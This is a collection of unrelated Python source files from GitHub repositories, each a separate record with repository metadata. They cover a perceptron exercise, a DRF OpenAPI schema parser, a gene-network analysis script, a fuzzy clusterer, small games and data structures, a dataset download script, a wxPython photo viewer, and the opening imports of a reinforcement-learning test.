plt.xlim(-0.05,1.05) # set the x limit \n plt.ylim(-0.05,1.05) # set the y limit \n x = np.arange(-10, 10, 0.1)\n plt.plot(x, m*x+b, color=color, linestyle=linestyle)\n\n\n\ndef stepFunction(t):\n '''\n stepFunction will fire (1) if the linear equation result is greater than 0, otherwise returns 0 \n\n parameters\n ----------\n t: int, predicted value\n\n returns: int with the neuron being fired or not\n '''\n if t >= 0:\n return 1\n return 0\n\ndef prediction(X, W, b):\n '''\n prediction will execute the matrix multiplication Wx + b \n\n parameters\n ----------\n X: numpy 1D array, input elements to perform the equations. Also called features\n W: numpy 1D array, weights for each element in X. 
\n b: int, bias unit \n\n returns: int representing the prediction after passing through the Step function\n '''\n linearCombination = np.matmul(X,W)+b\n return stepFunction(linearCombination[0])\n\n# The function should receive as inputs the data X, the labels y,\n# the weights W (as an array), and the bias b,\n# update the weights and bias W, b, according to the perceptron algorithm,\n# and return W and b.\ndef perceptronStep(X, y, W, b, learn_rate = 0.01):\n '''\n will apply the perceptron step based on the prediction\n\n parameters\n ----------\n X: numpy 1D array, input elements to perform the equations. Also called features\n y: numpy 1D array, labels to match the expected output from the prediction\n W: numpy 1D array, weights for each element in X. \n b: int, bias unit \n learn_rate: float, learning rate to be used at each perceptron step. optional. Default: 0.01\n '''\n\n for Xi, Yi in zip(X, y):\n y_hat = prediction(Xi, W, b)\n if y_hat == Yi:\n pass\n elif y_hat == 0:\n W[0] -= learn_rate * Xi[0]\n W[1] -= learn_rate * Xi[1]\n b = b + learn_rate\n elif y_hat == 1: \n W[0] -= learn_rate * Xi[0]\n W[1] -= learn_rate * Xi[1]\n b = b - learn_rate\n return W, b\n \ndef trainPerceptronAlgorithm(X, y, learn_rate = 0.01, num_epochs = 50):\n '''\n trainPerceptronAlgorithm runs the perceptron algorithm repeatedly on the dataset\n returns boundary lines obtained in the iterations\n\n parameters: \n -----------\n X: 1D numpy array with tuples: (x1, x2) representing the features \n y: 1D numpy array representing the labels \n learn_rate: float, optional. learning rate at which the perceptron step will be applied \n num_epochs: int, optional. Number of epochs to train the perceptron algorithm\n\n returns:\n boundary_lines: array with the tuple of coordinates to plot\n '''\n x_min, x_max = min(X.T[0]), max(X.T[0])\n y_min, y_max = min(X.T[1]), max(X.T[1])\n W = np.random.rand(2,1)\n b = np.random.rand(1)[0] + x_max\n # These are the solution lines that get plotted below.\n boundary_lines = []\n for i in range(num_epochs):\n # In each epoch, we apply the perceptron step.\n W, b = perceptronStep(X, y, W, b, learn_rate)\n boundary_lines.append((-W[0]/W[1], -b/W[1]))\n if i < num_epochs-1:\n display(-W[0]/W[1], -b/W[1])\n return boundary_lines\n\ndef build_arrays(filename):\n '''\n build_arrays will read a csv file with the inputs X and labels y and return a tuple of numpy arrays\n\n parameters:\n -----------\n filename: string, file containing the dataset to evaluate on\n\n returns: \n tuple, numpy arrays, representing inputs and labels \n '''\n data_frame = pd.read_csv(filename, names=[\"x1\", \"x2\", \"y\"])\n X = data_frame[[\"x1\", \"x2\"]].to_numpy()\n y = data_frame[[\"y\"]].to_numpy()\n return X,y \n\nif __name__ == \"__main__\":\n\n # Setting the random seed, feel free to change it and see different solutions.\n np.random.seed(42)\n\n X,y = build_arrays(\"data.csv\")\n\n num_epochs = 50\n lines = trainPerceptronAlgorithm(X, y)\n\n plt.title(\"Solution boundary\")\n display(lines[num_epochs-1][0][0],lines[num_epochs-1][1][0], 'black','-')\n\n # plot the points \n plot_points(X,y)\n plt.show()\n\n\n\n\n\n\n","repo_name":"laurauzcategui/deep_learning_nanodegree","sub_path":"neural_networks/l1_intro_to_neural_nets/3_10_perceptron.py","file_name":"3_10_perceptron.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12405709337","text":"from drf_yasg import openapi\n\nfrom .serializers import 
ResultSerializer, BuySellSerializer, ConditionInfoSerializer, DayHistorySerialilzer, YearHistorySerialilzer\n\nrest_framework_openapi_field_mapping = {\n \"EmailField\": openapi.TYPE_STRING,\n \"ImageField\": openapi.TYPE_STRING,\n \"ListField\": openapi.TYPE_ARRAY,\n \"CharField\": openapi.TYPE_STRING,\n \"TextField\": openapi.TYPE_STRING,\n \"BooleanField\": openapi.TYPE_BOOLEAN,\n \"FloatField\": openapi.TYPE_NUMBER,\n \"DateTimeField\": openapi.TYPE_STRING,\n \"IntegerField\": openapi.TYPE_INTEGER,\n \"SerializerMethodField\": openapi.TYPE_STRING,\n \"BigIntegerField\": openapi.TYPE_INTEGER\n}\n\ndef parse_rest_framework_field(field):\n rest_framework_field_type = field.split(\"(\")[0]\n openapi_field_type = rest_framework_openapi_field_mapping[rest_framework_field_type]\n if \"help_text=\" in field:\n field_description = field.split(\"help_text='\")[-1].split(\"'\")[0]\n else:\n field_description = None\n return openapi.Schema(type=openapi_field_type, description=field_description)\n\ndef parse_serializer(name):\n properties = {}\n \n if name == \"result\":\n serializer = ResultSerializer()\n elif name == \"buysell\":\n serializer = BuySellSerializer()\n elif name == \"condition\":\n serializer = ConditionInfoSerializer()\n elif name == \"day\":\n serializer = DayHistorySerialilzer()\n elif name == \"year\":\n serializer = YearHistorySerialilzer() \n \n for k,v in serializer.get_fields().items():\n if v.__module__ == \"rest_framework.fields\":\n properties[k] = parse_rest_framework_field(str(v))\n elif v.__module__.startswith(\"apps.\"):\n serializer = str(v).strip().split(\"(\")[0]\n exec(f\"from {v.__module__} import {serializer}\")\n eval_serializer = eval(f\"{serializer}()\")\n properties[k] = openapi.Schema(type=openapi.TYPE_OBJECT, properties=parse_serializer(eval_serializer))\n else:\n pass\n return properties\n\ndef get_serializer(name, description):\n \"\"\" Needs to return openapi.Schema() \"\"\"\n properties = parse_serializer(name)\n return_openapi_schema = openapi.Schema(type=openapi.TYPE_OBJECT, properties=properties, description=description)\n return return_openapi_schema","repo_name":"Hasky96/JRStock","sub_path":"backend/backtest/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15170206027","text":"import sys\nimport os\nimport subprocess\n\nimport igraph as ig\n\nfrom biomap import BioMap\nfrom deregnet.core import SubgraphFinder\n\nsys.path.append('.')\n\nfrom utils import get_rnaseq_score, get_rnaseq_score_for_patient, get_vogelstein\n\ndef main(argv):\n dataset = argv[1]\n graph_path = 'graphs/kegg_hsa_paper.graphml'\n if len(argv) > 2:\n graph_path = argv[2]\n #\n id_mapper = BioMap.get_mapper('hgnc')\n rnaseq_score = get_rnaseq_score(dataset, normalize_wrt='genewise_median')\n rnaseq_score.index = [gene.split('.')[0] for gene in rnaseq_score.index]\n rnaseq_score.index = list(id_mapper.map(list(rnaseq_score.index), FROM='ensembl', TO='entrez'))\n patients = list(rnaseq_score.columns)\n failed = []\n base_path = os.path.join('mode4', dataset)\n vogelstein = id_mapper.map(get_vogelstein(), FROM='symbol', TO='entrez')\n vogelstein = [gene for gene in vogelstein if gene]\n if not os.path.isdir(base_path):\n os.makedirs(base_path)\n for patient_id in patients:\n path = os.path.join(base_path, patient_id)\n nodes_already = set()\n i = 0\n for graphml in os.listdir(path):\n if not graphml.endswith('.graphml'):\n continue\n i += 1\n gf 
= os.path.join(path, graphml)\n G = ig.Graph.Read_GraphML(gf)\n nodes_already = nodes_already.union({v['name'] for v in G.vs})\n\n graph = ig.Graph.Read_GraphML(graph_path)\n graph.delete_vertices(graph.vs.select(name_in=nodes_already))\n finder = SubgraphFinder(graph)\n score = get_rnaseq_score_for_patient(patient_id, rnaseq_score)\n try:\n result = finder.run_average_deregnet(score,\n min_size=10,\n gap_cut=0.05,\n time_limit=1200,\n abs_values=True,\n receptors=vogelstein,\n terminals=vogelstein)\n except:\n failed.append(patient_id)\n path = os.path.join(path, 'suboptimal_'+str(i)+'.graphml')\n try:\n result.optimal.write_graphml(path)\n except:\n failed.append(patient_id)\n with open(os.path.join(base_path, 'failed.txt'), 'w') as fp:\n for fail in failed:\n fp.write(fail+'\\n')\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"sebwink/deregnet-tcga","sub_path":"old/aposteriori_suboptimal_mode4_uvm.py","file_name":"aposteriori_suboptimal_mode4_uvm.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"42291157419","text":"\nimport numpy as np\nimport pandas as pd\nimport os, copy\nimport joblib\nimport skfuzzy as fuzz\n\nclass clusterer(object):\n\n def __init__(self, fuzzy_path, fuzzy_file, type):\n self.fuzzy_file = os.path.join(fuzzy_path, fuzzy_file)\n fmodel = joblib.load(self.fuzzy_file)\n self.rules = fmodel['rules']\n if type == 'pv':\n self.p = 4\n elif type == 'wind':\n self.p = 3\n elif type == 'load':\n self.p = 4\n elif type == 'fa':\n self.p = 3\n\n def compute_activations(self, X):\n activations = pd.DataFrame(index=X.index, columns=[i for i in sorted(self.rules.keys())])\n var_del = []\n for rule in sorted(self.rules.keys()):\n act = []\n for mf in self.rules[rule]:\n if mf['var_name'] not in X.columns:\n var_names = [c for c in X.columns if mf['var_name'] in c]\n X[mf['var_name']] = X[var_names].mean(axis=1)\n var_del.append(mf['var_name'])\n act.append(fuzz.interp_membership(mf['universe'], mf['func'], X[mf['var_name']]))\n activations[rule] = np.power(np.prod(np.array(act), axis=0), 1 / self.p)\n if len(var_del) > 0:\n X = X.drop(columns=var_del)\n return activations\n","repo_name":"joesider9/forecasting_library","sub_path":"Fuzzy_clustering/ver_tf2/Clusterer.py","file_name":"Clusterer.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22940698910","text":"import random\n\ndef playersPoint():\n if(userCount>0 or compCount>0):\n print(\"User Points:\",userCount)\n print(\"Comp Points:\",compCount)\n else:\n print(\"User Points:\",userCount)\n print(\"Comp Points:\",compCount)\n\ndef roundResult():\n if userCount == compCount:\n print(\" ROUND DRAW \")\n elif userCount>compCount:\n print(\" USER WON THE ROUND \")\n else:\n print(\" COMPUTER WON THE ROUND \\n\")\n\ndef mainResult():\n if userCount == compCount:\n print(\" MATCH DRAW \")\n elif userCount>compCount:\n print(\" USER WON THE MATCH \")\n else:\n print(\" COMPUTER WON THE MATCH \\n\")\n\ndef playAgain(): \n print(\"\\n************************ THANKS FOR PLAYING GAME ********************\")\n print()\n \n\nchoice = \"y\"\nuserCount = 0\ncompCount = 0\nwhile choice == \"y\":\n list = [\"r\", \"p\", \"s\"]\n compChoice = random.choice(list) \n print(\"******************************************* CODED BY HARSHAD JOSHI *******************************************\", end = \"\\n\\n\")\n 
print(\"**************************************** STONE | PAPER | SCISSOR GAME ****************************************\", end = \"\\n\\n\")\n\n userChoise = input(\"OPTIONS:\\n 1. Rock as (r)\\n 2. Paper as (p)\\n 3. Scissor as (s)\\n\\nChoose any one among three: \")\n print(\"\\n\")\n\n if userChoise==\"s\" or userChoise==\"p\" or userChoise==\"r\":\n print(f\"User has choosen: {userChoise}\")\n print(f\"Computer has choosen: {compChoice}\", end = \"\\n\\n\")\n\n if compChoice == \"s\" and userChoise == \"p\":\n compCount += 2\n elif compChoice == \"p\" and userChoise == \"s\":\n userCount += 2\n elif compChoice == \"r\" and userChoise == \"p\":\n userCount += 2\n elif compChoice == \"p\" and userChoise == \"r\":\n compCount += 2\n elif compChoice == \"r\" and userChoise == \"s\":\n compCount += 2\n elif compChoice == \"s\" and userChoise == \"r\":\n userCount += 2\n elif((compChoice == \"s\" and userChoise == \"s\") or (compChoice == \"p\" and userChoise == \"p\") or (compChoice == \"r\" and userChoise == \"r\")):\n userCount += 1\n compCount += 1\n\n roundResult()\n print()\n playersPoint()\n print()\n choice = input('''To play again press \"y\" otherwise press any key: ''')\n print()\n mainResult()\n playAgain() \n else:\n print(\"Choose correct option as given above!\\n\")\n choice = input('''To play again press \"y\" otherwise press any key: ''') \n print()\n mainResult()\n playAgain() ","repo_name":"Harshad-Joshi1/RPS_Game","sub_path":"stone_paper_scissor.py","file_name":"stone_paper_scissor.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15700856950","text":"import argparse\nimport os\nimport requests\nimport sys\nimport typing\n\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom structsiren.datasets.shapes3d import URL, H5, SERIES\n\n\ndef _download(url: str, filename: str):\n r\"\"\"Download content at `url` to `filename`.\"\"\"\n print(f'downloading from {url} to {filename}')\n\n with open(filename, 'wb') as f:\n response = requests.get(url, stream=True)\n total = response.headers.get('content-length')\n\n if total is None:\n f.write(response.content)\n else:\n downloaded = 0\n total = int(total)\n for data in response.iter_content(\n chunk_size=max(int(total / 1000), 1024 * 1024)):\n downloaded += len(data)\n f.write(data)\n done = int(50 * downloaded / total)\n sys.stdout.write(\n '\\r[{}{}]'.format('█' * done, '.' 
* (50 - done)))\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n\ndef _cache_3d_shapes(\n cache_root: str,\n *,\n h5: typing.Optional[str] = None,\n download: bool = False\n):\n r\"\"\"Cache corpus of 3D-Shapes.\n\n Args:\n cache_root: folder to save images to\n h5: file with images\n download: option whether to download data if not available\n\n \"\"\"\n cache_root = os.path.abspath(os.path.expanduser(cache_root))\n if not os.path.exists(cache_root):\n os.mkdir(cache_root)\n\n if not h5:\n h5 = os.path.abspath(os.path.expanduser(H5))\n\n if not os.path.exists(h5):\n if not download:\n raise RuntimeError(\n f'h5 file not available at `{h5}`, '\n f'yet, download disabled.')\n\n _download(URL, h5)\n\n with h5py.File(h5, \"r\") as f:\n images = np.array(f['images'])\n labels = np.array(f['labels'])\n\n filenames = []\n\n for i, img in tqdm(\n enumerate(images),\n desc='Cache 3D-Shapes',\n total=images.shape[0]\n ):\n fname = os.path.join(cache_root, f'{str(i).zfill(5)}_img.npy')\n filenames.append(fname)\n np.save(fname, arr=img)\n\n series = pd.Series(data=labels.tolist(), index=filenames)\n series.to_pickle(\n os.path.join(cache_root, SERIES),\n compression='xz'\n )\n\n\ndef main(args: argparse.Namespace):\n\n _cache_3d_shapes(\n cache_root=args.cache_root,\n h5=args.h5,\n download=args.download\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n 'cache_root',\n type=str,\n help='path to folder where 3dshape content '\n 'should be stored'\n )\n\n parser.add_argument(\n '--h5',\n type=str,\n help='path to h5-file with 3dshape content. '\n f'If not specified, it is downloaded if '\n f'download option is activated',\n default=''\n )\n\n parser.add_argument(\n '--download',\n action='store_true',\n help='option whether to download `h5` file if not available'\n )\n\n main(parser.parse_args())\n","repo_name":"phtephanx/structsiren","sub_path":"scripts/3dshapes_prepare_data.py","file_name":"3dshapes_prepare_data.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26041843798","text":"class Node(object):\n def __init__(self, value: int) -> None:\n self.value = value\n self.left = None\n self.right = None\n\ndef insert(node: Node, value: int) -> Node:\n if node is None:\n return Node(value)\n\n if value < node.value:\n node.left = insert(node.left, value) \n else:\n node.right = insert(node.right, value)\n return node\n\ndef inOrder(node: Node) -> None:\n if node is not None:\n inOrder(node.left)\n print(node.value)\n inOrder(node.right)\n return \n\ndef search(node: Node, value) -> bool:\n if node is None:\n return False\n\n if value == node.value:\n return True\n elif value < node.value:\n return search(node.left, value)\n else:\n return search(node.right, value)\n\ndef min_val(node: Node) -> None:\n current = node\n if current.left is None:\n return current\n return min_val(current.left) \n\ndef remove(node: Node, value:int) -> None:\n if node is None:\n return node\n\n if value < node.value:\n node.left = remove(node.left, value)\n elif value > node.value:\n node.right = remove(node.right, value)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n\n temp = min_val(node.right)\n node.value = temp.value\n node.right = remove(node.right, temp.value) \n return node \n\nroot = None\nroot = insert(root, 3)\nroot = insert(root, 6)\nroot = insert(root, 5) \nroot = insert(root, 7) \nroot = insert(root, 1) 
\nroot = insert(root, 10) \nroot = insert(root, 2) \nroot = remove(root, 6)\ninOrder(root)","repo_name":"Kotarosz727/python-algorism","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8868235510","text":"import wx\nimport os\nimport sys\nimport datetime\nimport Model\nimport Utils\nimport PhotoFinish\nimport VideoBuffer\n\ndef getRiderName( info ):\n\tlastName = info.get('LastName','')\n\tfirstName = info.get('FirstName','')\n\tif lastName:\n\t\tif firstName:\n\t\t\treturn '%s, %s' % (lastName, firstName)\n\t\telse:\n\t\t\treturn lastName\n\treturn firstName\n\t\ndef getTitle( num, t ):\n\tif not num:\n\t\treturn ''\n\t\t\n\ttry:\n\t\texternalInfo = Model.race.excelLink.read()\n\texcept Exception:\n\t\tname = str(num)\n\telse:\n\t\tinfo = externalInfo.get(num, {})\n\t\tname = getRiderName( info )\n\t\tif info.get('Team', ''):\n\t\t\tname = '%d: %s (%s)' % (num, name, info.get('Team', '').strip())\n\t\t\t\n\tname = '%s - %s' % (name, Utils.formatTime(t, True))\n\treturn name\n\ndef RescaleImage( image, width, height ):\n\tbWidth, bHeight = image.GetWidth(), image.GetHeight()\n\t# Keep the same aspect ratio.\n\tar = float(bHeight) / float(bWidth)\n\tif width * ar > height:\n\t\twidth = height / ar\n\timage.Rescale( int(width), int(height), wx.IMAGE_QUALITY_NORMAL )\n\treturn image\n\t\ndef RescaleBitmap( dc, bitmap, width, height ):\n\tbWidth, bHeight = bitmap.GetWidth(), bitmap.GetHeight()\n\t# Keep the same aspect ratio.\n\tar = float(bHeight) / float(bWidth)\n\tif width * ar > height:\n\t\twidth = height / ar\n\timage = bitmap.ConvertToImage()\n\timage.Rescale( int(width), int(height), wx.IMAGE_QUALITY_HIGH )\n\tif dc.GetDepth() == 8:\n\t\timage = image.ConvertToGreyscale()\n\treturn image.ConvertToBitmap()\n\t\nclass PhotoSyncViewerDialog( wx.Dialog ):\n\tdef __init__(\n\t\t\tself, parent, ID = wx.ID_ANY, title=_('Photo Sync Previewer'), size=wx.DefaultSize, pos=wx.DefaultPosition, \n\t\t\tstyle=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER ):\n\n\t\tsuper().__init__(parent, ID, title, pos, size, style)\n\n\t\t# This next step is the most important, it turns this Python\n\t\t# object into the real wrapper of the dialog (instead of pre)\n\t\t# as far as the wxPython extension is concerned.\n\t\tself.PostCreate(pre)\n\t\t\n\t\tself.timeFrames = []\n\n\t\tself.vbs = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\tself.title = wx.StaticText( self, style=wx.ALIGN_LEFT )\n\t\tself.title.SetFont( wx.Font( (0,24), wx.FONTFAMILY_SWISS, wx.NORMAL, wx.FONTWEIGHT_NORMAL ) )\n\t\t\n\t\tself.captureButton = wx.ToggleButton( self, label = _('Reset Photo Capture') )\n\t\tself.captureButton.Bind( wx.EVT_TOGGLEBUTTON, self.OnCapture )\n\t\tself.captureCount = 0\n\t\t\n\t\tself.scrolledWindow = wx.ScrolledWindow( self )\n\t\tself.numPhotoSeries = 4\n\t\tself.numPhotos = 18\n\t\tself.iSeries = 0\n\t\tself.photoWidth, self.photoHeight = int(2 * 320 / 4), int(2 * 240 / 4)\n\t\tself.hgap = 4\n\t\tgs = wx.FlexGridSizer( rows = 2 * self.numPhotoSeries, cols = self.numPhotos, hgap = self.hgap, vgap = 4 )\n\t\tbitmap = wx.Bitmap( os.path.join(Utils.getImageFolder(), 'CrossMgrSplash.png'), wx.BITMAP_TYPE_PNG )\n\t\tself.bitmap = RescaleBitmap( wx.WindowDC(self), bitmap, self.photoWidth, self.photoHeight )\n\t\t\n\t\tself.photoBitmaps = [[wx.BitmapButton(\n\t\t\t\t\t\t\t\t\tself.scrolledWindow,\n\t\t\t\t\t\t\t\t\tlabel=self.bitmap, 
size=(self.photoWidth+4,self.photoHeight+4),\n\t\t\t\t\t\t\t\t\tstyle=wx.BU_AUTODRAW)\n\t\t\t\t\t\t\t\tfor i in range(self.numPhotos)] for s in range(self.numPhotoSeries)]\n\t\tself.photoLabels = [[wx.StaticText(self.scrolledWindow, style=wx.ALIGN_CENTRE) for i in range(self.numPhotos)]\n\t\t\t\t\t\t\t\tfor s in range(self.numPhotoSeries)]\n\t\tself.titles = [''] * self.numPhotoSeries\n\t\tfor s in range(self.numPhotoSeries):\n\t\t\tfor i, p in enumerate(self.photoLabels[s]):\n\t\t\t\tp.SetLabel( str(i) )\n\t\t\tfor i, w in enumerate(self.photoBitmaps[s]):\n\t\t\t\tw.Bind( wx.EVT_BUTTON, lambda event, s = s, i = i: self.OnBitmapButton(event, s, i) )\n\t\t\t\tw.Bind( wx.EVT_MOTION, lambda event, s = s, i = i: self.OnMouseMove(event, s, i) )\n\t\t\tgs.AddMany( (w,0,) for w in self.photoBitmaps[s] )\n\t\t\tgs.AddMany( (w,1,wx.ALIGN_CENTER_HORIZONTAL) for w in self.photoLabels[s] )\n\t\t\n\t\tself.scrolledWindow.SetSizer( gs )\n\t\tself.scrolledWindow.Fit()\n\t\twidth, height = self.scrolledWindow.GetBestSize()\n\t\tself.scrolledWindow.SetVirtualSize( (width, height) )\n\t\tself.scrolledWindow.SetScrollRate( 20, 20 )\n\t\tself.scrolledWindow.SetScrollbars( 1, 1, width, height )\n\t\t\n\t\twx.CallAfter( self.ScrollToPicture, self.numPhotos // 2 )\n\t\t\n\t\thb = wx.BoxSizer( wx.HORIZONTAL )\n\t\thb.Add( self.title, 1, flag=wx.ALL, border = 2 )\n\t\thb.Add( self.captureButton, 0, flag=wx.ALL|wx.ALIGN_RIGHT, border = 2 )\n\t\tself.vbs.Add( hb, 0, wx.EXPAND )\n\t\tself.vbs.Add( self.scrolledWindow, 1, wx.EXPAND )\n\t\t\n\t\tself.SetSizer( self.vbs )\n\t\t\n\t\tdisplayWidth, displayHeight = wx.GetDisplaySize()\n\t\tself.SetSize( (int(displayWidth * 0.75), min(height + 80, int(wx.GetDisplaySize()[1] * 0.9))) )\n\t\tself.vbs.Layout()\n\t\t\n\t\tself.clear()\n\n\tdef OnCapture( self, event ):\n\t\tif self.captureButton.GetValue():\n\t\t\tself.reset()\n\t\t\t\n\tdef reset( self ):\n\t\tself.captureCount = 0\n\t\tself.iSeries = 0\n\t\tself.captureButton.SetValue( True )\n\t\tself.clear()\n\t\t\n\tdef OnMouseMove( self, event, s, i ):\n\t\tself.title.SetLabel( self.titles[s] )\n\t\t\n\tdef OnBitmapButton( self, event, s, i ):\n\t\tlabel = self.photoLabels[s][i].GetLabel()\n\t\tfields = label.split()\n\t\tif len(fields) < 1:\n\t\t\treturn\n\t\tmilliseconds = fields[0]\n\t\tif milliseconds and Model.race:\n\t\t\tModel.race.advancePhotoMilliseconds = int( milliseconds )\n\t\t\tUtils.MessageOK( self, '{} {}'.format(_('Advance/Delay Photo Milliseconds set to'), milliseconds), _('Advance/Delay Milliseconds') )\n\t\t\n\tdef OnClose( self, event ):\n\t\tself.Show( False )\n\t\t\n\tdef ScrollToPicture( self, iPicture ):\n\t\txScroll = 0\n\t\tfor i, b in enumerate(self.photoBitmaps[self.iSeries]):\n\t\t\tif i == iPicture:\n\t\t\t\tbreak\n\t\t\txScroll += b.GetSize().GetWidth() + self.hgap\n\t\tself.scrolledWindow.Scroll( xScroll / self.scrolledWindow.GetScrollPixelsPerUnit()[0], -1 )\n\t\t\t\n\tdef clear( self ):\n\t\tself.timeFrames = []\n\t\tself.titles = [''] * self.numPhotoSeries\n\t\tfor s in range(self.numPhotoSeries):\n\t\t\tfor w in self.photoBitmaps[s]:\n\t\t\t\tw.SetBitmapLabel( self.bitmap )\n\t\t\tfor w in self.photoLabels[s]:\n\t\t\t\tw.SetLabel( '' )\n\t\t\n\tdef refresh( self, videoBuffer, t, num = None ):\n\t\tif not videoBuffer:\n\t\t\tfor s in range(len(self.photoLabels)):\n\t\t\t\tfor i in range(len(self.photoLabels[s])):\n\t\t\t\t\tself.photoBitmaps[s][i].SetBitmapLabel( self.bitmap )\n\t\t\t\t\tself.photoLabels[s][i].SetLabel( '' )\n\t\t\treturn\n\t\n\t\tif not 
self.captureButton.GetValue():\n\t\t\treturn\n\t\n\t\ttCur = videoBuffer.refTime + datetime.timedelta( seconds = t )\n\t\ttimeFrames = videoBuffer.findBeforeAfter( t, self.numPhotos // 2, self.numPhotos // 2, 60.0*60.0 )\n\t\tdeltaMS = [((tFrame - tCur).total_seconds() * 1000.0) for tFrame, frame in timeFrames]\n\t\t\n\t\tif len(timeFrames) < self.numPhotos:\n\t\t\td = self.numPhotos - len(timeFrames)\n\t\t\ttimeFrames = ([(None, None)] * d) + timeFrames\n\t\t\tdeltaMS = ([None] * d) + deltaMS\n\t\t\n\t\tphotoLabels = self.photoLabels[self.iSeries]\n\t\tphotoBitmaps = self.photoBitmaps[self.iSeries]\n\t\t\n\t\tdeltaMin = sys.float_info.max\n\t\tiMin = 0\n\t\tdc = wx.WindowDC( self )\n\t\tfor i, (tFrame, frame) in enumerate(timeFrames):\n\t\t\tif deltaMS[i] is not None and abs(deltaMS[i]) < deltaMin:\n\t\t\t\tdeltaMin = abs(deltaMS[i])\n\t\t\t\tiMin = i\n\t\t\tif deltaMS[i] is None:\n\t\t\t\tphotoLabels[i].SetLabel( '' )\n\t\t\t\tphotoBitmaps[i].SetBitmapLabel( wx.NullBitmap )\n\t\t\telse:\n\t\t\t\tphotoLabels[i].SetLabel( '{}ms'.format(deltaMS[i]) )\n\t\t\t\timage = PhotoFinish.PilImageToWxImage( frame )\n\t\t\t\timage = RescaleImage( image, self.photoWidth, self.photoHeight )\n\t\t\t\tbitmap = image.ConvertToBitmap()\n\t\t\t\tphotoBitmaps[i].SetBitmapLabel( bitmap )\n\n\t\tself.titles[self.iSeries] = getTitle( num, t )\n\t\tself.title.SetLabel( self.titles[self.iSeries] )\n\t\t\n\t\tself.Refresh()\n\t\t\n\t\tself.iSeries = (self.iSeries + 1) % self.numPhotoSeries\n\t\t\n\t\tself.captureCount += 1\n\t\tif self.captureCount >= self.numPhotoSeries:\n\t\t\tself.captureButton.SetValue( False )\n\t\t\t\t\nphotoSyncViewer = None\ndef PhotoSyncViewerShow( parent ):\n\tglobal photoSyncViewer\n\tif not photoSyncViewer:\n\t\tphotoSyncViewer = PhotoSyncViewerDialog( parent, title = _(\"Photo Sync Viewer\") )\n\tphotoSyncViewer.reset()\n\tphotoSyncViewer.Show( True )\n\t\ndef PhotoSyncViewerIsShown():\n\tglobal photoSyncViewer\n\treturn photoSyncViewer and photoSyncViewer.IsShown()\n\t\ndef PhotoSyncViewerHide():\n\tif not photoSyncViewer:\n\t\treturn\n\tphotoSyncViewer.Show( False )\n\tphotoSyncViewer.clear()\n\ndef StartPhotoSyncViewer( parent ):\n\tPhotoSyncViewerShow( parent )\n\t\ndef Shutdown():\n\tPhotoSyncViewerHide()\n\nif __name__ == '__main__':\n\timport time\n\timport shutil\n\t\n\trace = Model.newRace()\n\trace._populate()\n\n\tapp = wx.App(False)\n\t\n\tdirName = 'VideoBufferTest_Photos'\n\tif os.path.isdir(dirName):\n\t\tshutil.rmtree( dirName, True )\n\tos.mkdir( dirName )\n\t\n\ttRef = datetime.datetime.now()\n\tcamera = PhotoFinish.SetCameraState( True )\n\tvb = VideoBuffer.VideoBuffer( camera, tRef, dirName )\n\tvb.start()\n\ttime.sleep( 1.0 )\n\t\n\tmainWin = wx.Frame(None, title=\"CrossMan\", size=(600,400))\n\tmainWin.Show()\n\tphotoSyncDialog = PhotoSyncViewerDialog( mainWin, title = \"PhotoSyncViewer\", size=(600,400) )\n\tdef doRefresh( bib ):\n\t\tt = (datetime.datetime.now() - tRef).total_seconds()\n\t\twx.CallLater( 300, photoSyncDialog.refresh, vb, t, bib )\n\t\t\n\tphotoSyncDialog.Show()\n\tphotoSyncDialog.reset()\n\tbib = 100\n\tfor d in range(0, 1000*60, 1000):\n\t\twx.CallLater( max(1,d), doRefresh, bib )\n\t\tbib += 1\n\tapp.MainLoop()\n","repo_name":"esitarski/CrossMgr","sub_path":"PhotoSyncViewer.py","file_name":"PhotoSyncViewer.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"24673139517","text":"import logging\nimport socket\nimport sys\n\nlock_socket = 
None\n\ndef is_lock_free():\n global lock_socket\n lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n try:\n lock_id = \"my-username.my-task-name\" # this should be unique. using your username as a prefix is a convention\n lock_socket.bind('\\0' + lock_id)\n logging.debug(\"Acquired lock %r\" % (lock_id,))\n return True\n except socket.error:\n logging.info(\"Failed to acquire lock %r\" % (lock_id,))\n return False\n \nif not is_lock_free():\n sys.exit()\nfrom my_module import my_long_running_process\nmy_long_running_process()\n","repo_name":"okwow123/finaltest","sub_path":"longrunning.py","file_name":"longrunning.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40109744960","text":"import logging\nimport os\nimport tempfile\nimport warnings\n\nimport numpy as np\nimport pytest\nimport torch\nfrom torch import nn\n\nimport pfrl\nfrom pfrl.agents import a3c\nfrom pfrl.envs.abc import ABC\nfrom pfrl.experiments.evaluator import run_evaluation_episodes\nfrom pfrl.experiments.train_agent_async import train_agent_async\nfrom pfrl.nn import RecurrentBranched, 